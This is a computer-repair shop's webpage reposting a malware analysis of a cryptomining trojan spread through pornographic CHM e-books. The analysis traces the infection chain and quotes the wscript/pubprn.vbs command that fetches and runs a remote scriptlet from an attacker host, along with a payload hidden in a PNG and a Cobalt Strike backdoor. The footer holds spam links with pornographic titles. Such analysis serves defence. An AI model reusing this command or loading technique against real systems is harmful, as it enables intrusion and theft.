錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
挖礦木馬借“XX的秘密”等小黃書瘋傳,中毒后會劫持比特幣交易

作者: 佚名  日期:2018-06-05 10:42:53   來源: 本站整理

 一、概述
近期騰訊御見威脅情報中心捕獲到利用一堆色情類電子書(chm格式)傳播的惡意挖礦病毒,病毒使用一批極具誘惑力的文件名(本文分析樣本使用名為“想不想知道xx之間的秘密.chm”)在網絡中傳播。

病毒使用執行遠程腳本的方法,并結合白利用,代碼混淆,無文件內存裝載等技術來躲避安全廠商的查殺,受害者一旦打開這些chm格式的電子書,病毒便會隱藏進用戶機器中。
病毒目前行為主要有釋放挖礦病毒,安裝Chrome瀏覽器惡意插件,在用戶交易虛擬加密幣時劫持收款地址,盜取用戶facebook帳號信息,并自動在facebook網站分享若干“小黃書”chm下載鏈接實現蠕蟲式的傳播。

二、樣本分析
chm文檔結構如下圖,運行chm文檔后文檔內Load_HTML_CHM0.html內混淆的腳本代碼會以命令行”C:\Windows\System32\wscript.exe” /b C:/Windows/System32/Printing_Admin_Scripts/zh-CN/pubprn.vbs 127.0.0.1 script:hxxp://png.realtimenews.tk/chm.sct 
來執行hxxp://png.realtimenews.tk/chm.sct內的遠程腳本。

腳本代碼通過訪問一個外部鏈接的圖片q.png,并查找圖片數據中的tEXt,iENd兩個標記,截取tEXt+4位置到iENd-8處的文件內容,Base64解碼后存放到Temp目錄以tmpg.Jpg命名,并用Rundll32.exe拉起執行,tmpg.Jpg其實為一個帶有導出函數VoidFunc且加殼的DLL。
截取png中隱藏數據

q.png表象上看為一個透明背景中心發亮的PNG圖片。

q.png文件tEXt+4位置指向了一個BASE64編碼的PE文件內容開始位置.

q.png文件iENd-8指向了一個BASE64編碼的PE文件內容末尾位置。

Rundll32.exe進一步拉起執行tmpg.Jpg

tmpg.Jpg為帶有導出函數VoidFunc的DLL

被RunDll32拉起的tmpg.Jpg通過執行導出函數VoidFun,然后在內存中解密出一段Shellcode,通過CreateThread的方式執行起來。
創建線程執行Shellcode

Shellcode代碼通過遍歷LDR鏈找到kernel32模塊,然后獲取LoadLibraryA的地址,加載Wininet模塊,然后獲得一系列網絡操作函數
InternetConnectA,httpOpenRequestA,httpSendRequestA地址調用,最終向域名
dazqc4f140wtl.cloudfront.net發送一個Get網絡請求,并使用InternetReadFIle來接收網絡文件數據流,請求域名藏在Shellcode的尾部。
Shellcode裝載Wininet模塊

Get請求域名藏在解密后的Shellcode尾部

通過抓包工具可以直接看到,Get請求后服務器發送回來的數據流有一個明文的PE文件,通過從內存Dump出該模塊可知該模塊還是一個DLL,并使用反射式加載的方法,實現該模塊代碼不落地裝載。
病毒Get請求后返回的明文PE文件數據流

反射式加載的DLL

觀察該模塊可知為Cobalt Strike生成的DLL后門攻擊模塊,該后門攻擊模塊數據交互支持HTTP、HTTPS、DNS和SMB隧道協議,本次樣本使用HTTP協議的方式進行通信交互,后門攻擊模塊首先通過異或0×69解密出上線配置信息。



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 久久无码人妻一区二区三区午夜| 无码人妻精品一区二区蜜桃网站| 无码精品久久一区二区三区| 中文无码精品A∨在线观看不卡| 成人免费无码大片a毛片软件| 亚洲精品无码久久不卡| 日韩精品无码一本二本三本| 亚洲中文字幕久久精品无码A| 亚洲成a人在线看天堂无码 | 亚洲va无码手机在线电影| 国产50部艳色禁片无码| 国产丝袜无码一区二区视频| 亚洲av无码成h人动漫无遮挡 | 人妻老妇乱子伦精品无码专区| 夜夜添无码试看一区二区三区| 亚洲AV无码XXX麻豆艾秋| 野花在线无码视频在线播放| 亚洲精品无码av中文字幕| 国产日韩AV免费无码一区二区| 无码无套少妇毛多69XXX| 日韩精品少妇无码受不了| 日本精品人妻无码免费大全| 亚洲AV永久青草无码精品| 精品久久久久久无码人妻蜜桃 | 国产精品午夜无码AV天美传媒| 国产a级理论片无码老男人| 亚洲精品无码久久久久AV麻豆| 毛片一区二区三区无码| 精品人妻系列无码一区二区三区| 国产精品多人p群无码| 亚洲成?Ⅴ人在线观看无码| 免费无码看av的网站| 久久精品无码中文字幕| 亚洲av无码无线在线观看| 久久久久成人精品无码中文字幕| 无码人妻精品中文字幕免费| 亚洲AV无码成人精品区在线观看| 国产成人无码区免费网站 | 人妻无码人妻有码中文字幕| mm1313亚洲精品无码又大又粗| 国产成人无码午夜视频在线观看|